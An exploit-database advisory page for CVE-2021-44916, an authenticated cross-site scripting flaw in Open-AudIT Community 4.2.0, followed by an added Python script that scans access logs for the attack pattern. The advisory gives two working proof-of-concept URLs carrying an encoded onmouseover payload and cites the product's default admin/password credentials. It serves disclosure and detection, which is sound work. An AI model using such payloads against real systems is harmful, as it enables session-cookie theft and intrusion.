| Title | Published | Views | Reporter |
|---|---|---|---|
| Open-AudIT Community 4.2.0 - Cross-Site Scripting Vulnerability | 10 Jan 2022 00:00 | – | zdt |
| CVE-2021-44916 | 20 Dec 2021 14:39 | – | circl |
| Opmantek Open-AudIT cross-site scripting vulnerability | 20 Dec 2021 00:00 | – | cnnvd |
| CVE-2021-44916 | 20 Dec 2021 11:31 | – | cve |
| CVE-2021-44916 | 20 Dec 2021 11:31 | – | cvelist |
| Open-AudIT Community 4.2.0 - Cross-Site Scripting (XSS) (Authenticated) | 10 Jan 2022 00:00 | – | exploitdb |
| EUVD-2021-31714 | 3 Oct 2025 20:07 | – | euvd |
| CVE-2021-44916 | 20 Dec 2021 12:15 | – | nvd |
| Cross site scripting | 20 Dec 2021 12:15 | – | prion |
| CVE-2021-44916 | 22 May 2025 18:55 | – | redhatcve |

```
# Exploit Title: Open-AudIT Community 4.2.0 - Cross-Site Scripting (XSS) (Authenticated)
# Date: 01/11/2021
# Exploit Author: Dominic Clark (parzival)
# Vendor Homepage: https://opmantek.com/
# Software Link: https://www.open-audit.org/downloads.php
# Category: WebApps
# Version: <= 4.2.0
# Tested on: Windows 10
# CVE: CVE-2021-44916
# 1. Vendor Description
# Open-AudIT is an application to tell you exactly what is on your network, how it is configured and when it changes.
# Essentially, Open-AudIT is a database of information that can be queried via a web interface.
# Open-AudIT will run on both Windows and Linux systems.
# 2. Technical Description
# There is an issue with link creation in the GUI with Open-AudIT Community.
# If a bad value is passed to the routine via a URL, JavaScript code can be executed.
# This requires the user to be logged in to Open-AudIT Community to trigger.
# 3. Proof of Concept
# Step 1: Log in to Open-AudIT via the login page (default credentials are admin/password)
# Step 2: Enter one of the following PoC URLs. This issue was observed to occur any time there is a file available to be imported (e.g., http://localhost/open-audit/index.php/attributes/import):
Vulnerable URL 1: "http://localhost/open-audit/index.php/discoveries/import%22onmouseover%3d%22alert(1)%22style%3d%22position%3aabsolute%3bwidth%3a100%25%3bheight%3a100%25%3btop%3a0%3bleft%3a0%3b%22"
Vulnerable URL 2: "http://localhost/open-audit/index.php/credentials/import%22onmouseover%3d%22alert(1)%22style%3d%22position%3aabsolute%3bwidth%3a100%25%3bheight%3a100%25%3btop%3a0%3bleft%3a0%3b%22"
# Step 3: Observe that the payload successfully executes and a popup is displayed.
# This vulnerability can be exploited in conjunction with a social engineering attack to potentially obtain sensitive information such as a user's session cookie.
# 4. Remediation
# Apply the recommended workarounds and mitigations provided by Opmantek.
# https://community.opmantek.com/display/OA/Errata+-+4.2.0+and+earlier+Javascript+vulnerability
```
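
A defender-side check for the request pattern described in the advisory, as an added example that is not part of the original advisory or of Open-AudIT: it scans web-server access logs for Open-AudIT paths that percent-decode to an attribute-breaking character, and rates them higher when an inline event handler follows. The combined log format, the sample lines and all function names are assumptions.

```python
import re
from urllib.parse import unquote, urlsplit

# Constructed access-log lines (not from the page). Lines 2 and 3 carry the
# request paths of the two PoC URLs quoted in the advisory, shortened.
SAMPLE_LOG = '''\
10.0.0.5 - - [10/Jan/2022:09:14:02 +0000] "GET /open-audit/index.php/discoveries/import HTTP/1.1" 200 5120
10.0.0.7 - - [10/Jan/2022:09:15:40 +0000] "GET /open-audit/index.php/discoveries/import%22onmouseover%3d%22alert(1)%22style%3d%22position%3aabsolute%3b%22 HTTP/1.1" 200 5342
10.0.0.8 - - [10/Jan/2022:09:16:11 +0000] "GET /open-audit/index.php/credentials/import%22onmouseover%3d%22alert(1)%22 HTTP/1.1" 200 5301
10.0.0.9 - - [10/Jan/2022:09:17:30 +0000] "GET /open-audit/index.php/devices?q=%22lab%22 HTTP/1.1" 200 880
'''

REQUEST = re.compile(r'^(\S+) .*?"(?:GET|POST) (\S+) HTTP/[\d.]+"')
APP_PREFIX = "/open-audit/index.php/"       # base path taken from the PoC URLs
ATTR_BREAKOUT = re.compile(r'["\'<>]')      # ends an HTML attribute value or tag
EVENT_HANDLER = re.compile(r"\bon[a-z]+\s*=", re.I)  # e.g. onmouseover=

def decode_path(raw, max_rounds=3):
    """Percent-decode until the value stops changing (bounded)."""
    for _ in range(max_rounds):
        decoded = unquote(raw)
        if decoded == raw:
            break
        raw = decoded
    return raw

def scan(log_text):
    """Return (client, decoded_path, severity) for suspicious requests."""
    findings = []
    for line in log_text.splitlines():
        m = REQUEST.match(line)
        if not m:
            continue
        client, target = m.groups()
        # Only the path is inspected: the advisory's payload sits in the path.
        path = decode_path(urlsplit(target).path)
        # Assumption: legitimate route paths never contain quotes or angle brackets.
        if not path.startswith(APP_PREFIX) or not ATTR_BREAKOUT.search(path):
            continue
        severity = "high" if EVENT_HANDLER.search(path) else "review"
        findings.append((client, path, severity))
    return findings

if __name__ == "__main__":
    for client, path, severity in scan(SAMPLE_LOG):
        print(f"{severity:6} {client} {path}")
```

Quotes in a query string (the last sample line) are deliberately not flagged here; extend `scan` to the query only if the resulting volume is manageable for your deployment.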